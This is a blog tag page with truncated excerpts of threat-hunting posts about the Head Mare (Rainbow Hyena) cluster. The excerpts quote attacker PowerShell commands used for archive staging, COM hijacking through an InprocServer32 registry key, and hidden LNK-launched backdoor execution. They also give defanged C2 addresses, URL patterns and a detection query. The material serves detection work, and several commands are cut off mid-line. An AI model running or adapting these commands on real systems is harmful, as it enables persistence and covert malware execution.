
Showing posts with the label rainbow hyena

256. That's How Adversaries Abuse PowerShell Cmdlets

Hello everyone! I've brought you another PowerShell (T1059.001) procedure you may use in your threat hunting missions! Let's look inside a new report on Head Mare (we track this cluster as Rainbow Hyena). The adversary downloaded archives with additional backdoors from a remote server and used PowerShell to expand them:

powershell expand-archive -force -path C:\ProgramData\YandexUpdate\update.zip -destinationpath C:\ProgramData\YandexUpdate\

The threat actors chose ProgramData as a staging folder, so we can use it to build the query and look for suspicious events:

event_type: "processcreatewin" AND proc_file_path: "powershell.exe" AND cmdline: ("expand-archive" AND "programdata")

See you tomorrow!

239. That's How Adversaries Abuse PowerShell for Component Object Model Hijacking

Hello everyone! Do you remember that PowerShell has an almost countless number of procedures? So today we'll look at another one, which involves the following technique: Event Triggered Execution: Component Object Model Hijacking (T1546.015). This time the example we are going to look at belongs to Head Mare (or Rainbow Hyena). Once again the adversary leveraged malicious LNK files in order to execute the following PowerShell command:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -c "New-Item -Path 'HKCU:\Software\Classes\CLSID\{c53e07ec-25f3-4093-aa39-fc67ea22e99d}\InprocServer32' -Force|Set-Item -Value 'C:\ProgramData\winnt64_.dll';$r=[System.IO.Path]::Combine($(gl).Path,'Задание_на_оценку_N_2046_от_05_августа_2025_года.zip');if(Test-Path $r){[System.IO.File]::WriteAllBytes([System.IO.Path]::Combine($env:ProgramData,'winnt64_.dll'),([System.IO.File]::ReadAllBytes($r)|select -Skip 16 -First 642064));}el...

197. Hunting for C2 Request Patterns

Hello everyone! Let's keep talking about C2 communications. This time we'll look at an activity cluster we track as Rainbow Hyena (it's also known as Head Mare). Let's look at the following part of the report:

After collecting initial information about the compromised system, the backdoor establishes a connection with the C2 server. The communication is carried out over HTTP, using GET and POST requests. The malware generates a GET request and accesses a URL in the following format:

91.239.148[.]21/poll?id=&hostname=&domain=

As you can see, there's a certain pattern we can use for hunting even if we don't know the IP address of the server. Let's look at another example. It's the same group, but the pattern is different:

hxxp://195.58.54[.]39:80/connect
hxxp://195.58.54[.]39/check
hxxp://195.58.54[.]39/command
hxxp://195.58.54[.]39/init

And this is another thing you should notice, document and use for threat hunting, both internal and external. Se...

091. Hunting for Malicious LNK Files as Seen in a Recent Head Mare Campaign

Hello everyone! Today we'll look at another curious example of PowerShell abuse, this time from Head Mare (we track this activity cluster as Rainbow Hyena). The adversary distributed password-protected archives with malicious LNK files. The LNK file executes the following PowerShell command to run the PhantomPyramid backdoor on the compromised system:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -c "$r=$(Get-Location).Path + '\\x417\x430\x44f\x432\x43a\x430_\x413\x423\x412_5_03\x414.zip';if(Test-Path $r) { cmd.exe /c start /B $r; } else { $f=$(Get-ChildItem -Path 'C:\Users\<USER>' -Recurse -Filter '\x417\x430\x44f\x432\x43a\x430_\x413\x423\x412_5_03\x414.zip' | Select-Object -First 1); if($f) { $r=$f.FullName; cmd.exe /c start /B $f.FullName; }; };if(-Not (Test-Path $r)) { $r=$(Get-ChildItem -Path 'C:\Users\<USER>\AppData\Local\Temp' -Recurse -Filter "\x417\x430\x44f\x432\x43a\x430_\...